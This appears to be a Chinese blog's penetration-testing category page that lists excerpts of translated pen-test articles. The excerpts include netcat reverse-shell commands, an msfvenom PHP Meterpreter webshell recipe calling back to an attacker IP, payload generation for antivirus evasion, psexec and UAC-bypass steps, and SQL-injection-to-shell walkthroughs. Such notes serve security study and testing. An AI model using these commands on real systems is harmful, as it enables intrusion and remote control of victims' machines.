![](https://img-blog.csdnimg.cn/20201014180756780.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
渗透测试
文章平均质量分 64
iteye_16188
这个作者很懒,什么都没留下…
展开
-
[译]解密MSSQL密码
原文地址:[url]https://blog.netspi.com/decrypting-mssql-database-link-server-passwords/[/url][url]https://blog.netspi.com/decrypting-mssql-credential-passwords/[/url](一)Linked ServersMSSQL在数据库中hash...原创 2015-03-26 00:43:50 · 1064 阅读 · 0 评论 -
psexec(续)
在早期的psexec版本中,如果使用-u username -p password选项,username和密码会明文传输。为了避免这种情况可以使用下面的办法。[code="java"]1. C:\>net use \\192.168.1.101\IPC$ /u:testxp\admin *2. 弹出对话框要求输入密码,输入密码3.C:\>psexec.exe \\192.168.1...原创 2014-11-15 15:45:05 · 137 阅读 · 0 评论 -
[译]psexec杂谈
原文地址:http://pen-testing.sans.org/blog/pen-testing/2013/03/18/a-penetration-testers-pledgepsexec(包含Metasploit中的psexec, nmap中的smb-psexec脚本,以及Microsoft Sysinternals)这些工具在后渗透中及其有用。psexec可以在全补丁的系统上运行,一...原创 2014-11-14 02:00:23 · 119 阅读 · 0 评论 -
[译]snmp使用
原文地址:[url]http://pen-testing.sans.org/blog/pen-testing/2013/05/31/invasion-of-the-network-snatchers-part-i[/url][color=blue]个人认为本文精彩的地方在于如何制作暴力破解的字典[/color]在大的组织中,网络设备的认证是通过TACACS或Radius控制的,他们同来...原创 2014-11-13 23:19:17 · 203 阅读 · 0 评论 -
windows hack exposed
netbios enum1. net view /domain2. net view /domain:coreoneDumping the netbios name1. nbtstat -A 192.168.1.1Scan netbios name tables1. nbtscan 192.168.1.1/24Enum Windows Dom...原创 2014-11-12 07:42:27 · 133 阅读 · 0 评论 -
[译]web shell中使用su
原文地址:[url]http://pen-testing.sans.org/blog/pen-testing/2014/07/08/sneaky-stealthy-su-in-web-shells[/url][b][color=red]本文的重点是讲述如何使用su[/color][/b]场景:web服务器中存在一个上传漏洞,site确保上传文件以.jpg或.png结尾。这时,上传一个she...原创 2014-11-11 01:58:25 · 185 阅读 · 0 评论 -
PHP RFI
原文地址:https://www.idontplaydarts.com/2011/03/php-remote-file-inclusion-command-shell-using-data-stream/PHP5.2及后续版本支持流封装。流封装的基本原理是通过另一个协议或服务写一个接口,然后可以使用你需要的函数获得数据。例如[code="php"]$session=ssh2...原创 2014-11-09 01:45:38 · 175 阅读 · 0 评论 -
目录遍历漏洞小结
1. 首先使用dotdotpwn发现漏洞2. 如果存在,则使用Panoptic搜集有用信息原创 2014-11-04 23:32:25 · 325 阅读 · 0 评论 -
默认口令枚举DPE
原文地址:[url]http://resources.infosecinstitute.com/dpe-the-structured-enumeration-of-default-credentials-and-passwords/[/url]DPE: Default Password EnumerationDPE主要目标是增加"密码审计扫描器"的操作性。在渗透测试过程中,安全审计人员通常...原创 2014-11-02 00:21:58 · 193 阅读 · 0 评论 -
[译]通过SQLi获得逆向shell
原文地址:http://resources.infosecinstitute.com/anatomy-of-an-attack-gaining-reverse-shell-from-sql-injection/本文使用DVWA作为演示首先将dvwa安全级别配置为low[img]http://dl2.iteye.com/upload/attachment/0102/7196/98ac5c...原创 2014-11-01 20:22:47 · 196 阅读 · 0 评论 -
Webscarab特点
原文:https://www.owasp.org/index.php/Category:OWASP_WebScarab_Projectkali中已存在该软件[b]分片-[/b]当web数据流通过代理或插件的时候,可以从html页面中抽取脚本和html注释。[b]代理-[/b]观察浏览器和web服务器之前的通信。WebScarab可以窥探HTTP和HTTPS数据流,通过在WebS...原创 2014-10-31 01:16:01 · 248 阅读 · 0 评论 -
php Meterpreter Webshell
1. msfvenom -p php/meterpreter/reverse_tcp LHOST=Attacker's_IP LPORT=443 T > ./a.php2. 上传a.php到web服务器3. 启动msfconsole4. use multi/handler5. set LHOST Attacker's_IP6. set LPORT 4437. set ...原创 2014-11-17 02:22:17 · 373 阅读 · 1 评论 -
渗透测试一览表
原文地址:http://pen-testing.sans.org/blog/pen-testing/2013/06/20/announcing-the-ultimate-sans-pen-test-poster[img]http://dl2.iteye.com/upload/attachment/0103/3468/219df49b-8f20-36ab-bf85-cb7abb7db85...原创 2014-11-19 01:24:35 · 293 阅读 · 0 评论 -
[译]网络渗透测试及其,工具及资源
原文地址:http://pen-testing.sans.org/blog/pen-testing/2013/11/21/network-pen-testing-tips-tricks-tools-resources[color=blue][b]方法[/b][/color]侦查--大多数会跳过或缺少的步骤。毫无疑问,这是最重要的一步。如果做得好,可以不使用任何exploit就可以获得访...原创 2014-11-19 02:06:31 · 205 阅读 · 0 评论 -
自动化Man-in-the-Middle SSHv2攻击
参考:[url]http://www.david-guembel.de/index.php?id=6[/url] [url]https://milo2012.wordpress.com/2014/11/12/automating-man-in-the-middle-sshv2-attacks/[/url] [url]http://www.david-guembel.de...原创 2015-03-18 01:26:06 · 132 阅读 · 0 评论 -
[译]剪切粘贴二进制文件
原文地址:[url]http://pen-testing.sans.org/blog/pen-testing/2014/12/10/awkward-binary-file-transfers-with-cut-and-paste[/url][b]Step 1 压缩源文件[/b][quote][color=blue]root@kali:~# gzip /bin/nc.traditio...原创 2014-12-17 01:20:45 · 384 阅读 · 0 评论 -
the-backdoor-factory
参考:[url]https://github.com/secretsquirrel/the-backdoor-factory[/url]貌似很有趣,值得深入了解了解 :wink: [b]安装过程[/b][code="java"]1. easy_installwget "https://pypi.python.org/packages/source/e/ez_setup/ez_set...原创 2014-11-27 01:30:21 · 714 阅读 · 0 评论 -
[工具]PCredz
项目地址:[url]https://github.com/lgandx/PCredz[/url]用来从pcap文件或者现在在线的接口中获得信用卡号,NTLM(DE-RPC, HTTP, SQL, LDAP等),Kerberos(AS-REQ Pre-Auth etype 23),HTTP Basic,SNMP,FTP,IMAP等。[b]特点:[/b]1. 可以从pcap文件或在线接...原创 2014-11-26 22:10:20 · 128 阅读 · 0 评论 -
[译]PsExec绕过UAC
原文地址:[url]http://pen-testing.sans.org/blog/pen-testing/2013/08/08/psexec-uac-bypass[/url][color=red][b]注意:本例可以通过metasploit中exploit/windows/local/current_user_psexec模块解决。[/b][/color][b]场景:[/b]...原创 2014-11-25 01:15:42 · 376 阅读 · 0 评论 -
Kerberos 认证过程
[img]http://dl2.iteye.com/upload/attachment/0103/5028/d55fc491-86dc-3590-974a-1d255f333092.png[/img]原创 2014-11-22 01:06:35 · 107 阅读 · 0 评论 -
[译]phpMyAdmin利用
原文地址:[url]http://pen-testing.sans.org/blog/pen-testing/2013/04/10/putting-the-my-in-phpmyadmin[/url][code="java"]$ nmap -sT -T3 -PS80,443,8000,8443,8800 -p 80,443,8000,8443,8080 -oA http-enum-re...原创 2014-11-21 02:11:47 · 111 阅读 · 0 评论 -
[译]用python来玩转Volume Shadow copies
原文地址:http://pen-testing.sans.org/blog/pen-testing/2013/04/12/using-volume-shadow-copies-from-pythonVolume Shadow copies 提供管理员工具来访问Windows,包含最新删除的的文件,带锁的文件等。他们就像通道一样直达Windows文件系统,用来挖掘各种有价值的信息。Vol...原创 2014-11-20 22:54:17 · 400 阅读 · 0 评论 -
[译]通过认证的SMB Sessions攫取信息
原文地址:http://pen-testing.sans.org/blog/pen-testing/2013/07/24/plundering-windows-account-info-via-authenticated-smb-sessions通过SMB,可以远程获得共享文件,注册表,服务,域认证以及更多信息。Linux下进行Windows SBM访问的工具之一是rpcclient。...原创 2014-11-20 02:06:50 · 260 阅读 · 0 评论 -
Laudanum
项目地址:[url]http://sourceforge.net/projects/laudanum/[/url]Laudanum是可注入文件集合,用于在SQL注入被发现后使用,提供shell,DNS查询,LDAP信息原创 2014-11-20 01:42:54 · 524 阅读 · 0 评论 -
arachni手册
[b]快速开始[/b][b]帮助[/b]使用-h来查看arachni功能arachni -h当扫描进行时,可以使用回车键来暂停/恢复,中断,延缓执行,以及查看一个发现的问题的总结。可以这样运行arachni:[code="java"]arachni http://test.com[/code]将会加载所有的checks,在/plugins/defaults下的插件,审计...原创 2014-10-30 01:41:34 · 1346 阅读 · 0 评论 -
arachni编译
[b]安装:[/b][code="xml"]apt-get install build-essential curl libcurl3 libcurl4-openssl-dev ruby ruby-devgem install rakeapt-get install libssl-devgit clone git://github.com/Arachni/arachni.git...原创 2014-10-29 02:03:30 · 209 阅读 · 0 评论 -
[译]5步分析pdf文件
原文:http://countuponsecurity.com/2014/09/22/malicious-documents-pdf-analysis-in-5-steps/大多数企业网络边界都被保护。然而恶意pdf文件或MS office 软件可以成功通过防火墙,IPS,Anti-spam,杀毒软件以及其它保护措施。当到达受害邮箱后,通过使用社会工程技巧诱惑用户点击/打开文档。例如,如果用户...原创 2014-09-29 21:45:14 · 169 阅读 · 0 评论 -
[转]sqli雅虎
原文地址:http://www.sec-down.com/wordpress/?p=494Today I will blog about a SQL Injection vulnerability that were escalated to Remote Code Execution, Escalated to Root Privilege on one of Yahoo servers....原创 2014-09-29 20:36:59 · 66 阅读 · 0 评论 -
[译]w3af指南(四)
原文:[url]http://resources.infosecinstitute.com/w3af-tutorial-4/[/url]之前的文件我们学习了w3af中的插件以及他们的应用场合。本文,我们将学习一些w3af中附带的其他工具,他们可以帮助我们发送Manual Requests,进行Fuzzing,加密/解密请求和应答,使用代理截获/修改请求/应答,以及允许我们进行不同的HTTP请求...原创 2014-09-25 22:55:29 · 273 阅读 · 0 评论 -
[译]PowerSploit
原文:https://www.pentestgeek.com/2013/09/18/invoke-shellcode/渗透测试人员有很多方法可以获得GUI访问目标机器,例如猜测RDP, ESX 或vnc口令。然而绕开AV获得Meterpreter的最简单方法是使用PowerSploit([url]https://github.com/mattifestation/PowerSploit[/ur...原创 2014-09-25 21:13:07 · 147 阅读 · 0 评论 -
[译]psexec_command
原文:https://www.pentestgeek.com/2013/01/10/psexec_command-not-your-daddys-psexec/由于禁止了Volume Shadow copy服务以及远程桌面服务,但是由于拥有管理员权限,所以使用Metasploit中的psexec_command模块psexec_command 模块类似sysinternals psexec...原创 2014-09-25 00:37:09 · 172 阅读 · 0 评论 -
[译]w3af指南(三)
原文地址:http://resources.infosecinstitute.com/w3af-tutorial-3/本文将继续介绍前文剩下的插件。本文继续使用前文使用的Web Security Dojo虚拟机,下载地址:[url]http://sourceforge.net/projects/websecuritydojo/files/[/url][b]1)Brute force...原创 2014-09-24 00:52:31 · 325 阅读 · 0 评论 -
[译]w3af指南(二)
原文链接:[url]http://resources.infosecinstitute.com/w3af-tutorial-2/[/url]本文我们将继续学习如何使用w3af的discovery和audit插件来进行web漏洞扫描和相应的漏洞利用。同时我们将学习各种w3af使用的技术来发现这些漏洞。本文我们使用gui版本。[b]Web Security Dojo[/b]进行测试...原创 2014-09-23 17:22:36 · 267 阅读 · 0 评论 -
[译]w3af指南(一)
原文出自:http://resources.infosecinstitute.com/w3af-tutorial/w3af (Web Application audit and attack framework)是一个web安全审计框架。本文将学习w3af的大部分特性以及如何使用它进行web渗透测试。[b][color=red][注]原文写于2012年。最新的w3af是1.6.0....原创 2014-09-23 12:57:01 · 568 阅读 · 0 评论 -
[译]windows提权基本法则
原文地址:http://fuzzysecurity.com/tutorials/16.html注意我将会使用各种版本的Windows来强调命令行可能存在的差异。记住不同的OS/SP差异可能导致命令格式不存在或者产生轻微不同的输出。我尝试把本文组织成各个版本的Windows通用的提权方法。(一)信息收集1)获取操作系统版本[color=red]C:\Windows\syste...原创 2014-09-18 00:07:15 · 518 阅读 · 0 评论 -
netcat反弹shell
注意:如果想要在小于1024的端口做监听,那么需要root权限一)通用场合1. 自己机器:nc —nvlp 4432. 目标机:nc attacker'sIP 443 —e /bin/bash-n:不解析域名 -v:显示连接信息 -l:处于监听状态 -p:端口号(有时需要单独把-p选项拿出来)二)如果不支持-e选项:如果代码编译的时候没有指定GAPING_SECURITY_...原创 2014-09-01 22:40:08 · 718 阅读 · 0 评论 -
[持续更新]工具集
[Javascript Deobfuscation Tools Redux] [url]http://www.kahusecurity.com/2014/javascript-deobfuscation-tools-redux/[/url][14 Best Open Source Web Application Vulnerability Scanners][url]http://...原创 2014-09-29 21:51:09 · 96 阅读 · 0 评论 -
使用Metasm来绕过杀毒软件
技术本质还是花指令,本文的目的是使用metasploit框架来生成raw payload,反汇编payload,使用花指令,然后重新编译成二进制可执行文件1. msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=443 R > raw_binary2.拷贝metasm.rb文件和metasm文件夹到rub...原创 2014-09-30 20:59:40 · 443 阅读 · 0 评论 -
[译]使用sql创建后门
原文地址:http://resources.infosecinstitute.com/backdoor-sql-injection/在读本文之前应该参考http://resources.infosecinstitute.com/blind-sql-injection/本文的目的是通过sql注入漏洞来执行任意命令。为了运行OS命令,我们需要有一个命令行shell(CMD),或者运行允许我...原创 2014-10-10 02:09:00 · 696 阅读 · 0 评论 -
netcat
原文地址:http://resources.infosecinstitute.com/netcat-tcpip-swiss-army-knife/1.用于对话:机器A:netcat -l -p 443机器B:netcat 192.168.59.142 4432.端口发现虽然netcat不能提供类似nmap,scapy所能提供的高级功能,但是它可以用来发现端口。nc -v -...原创 2014-10-25 00:00:11 · 90 阅读 · 0 评论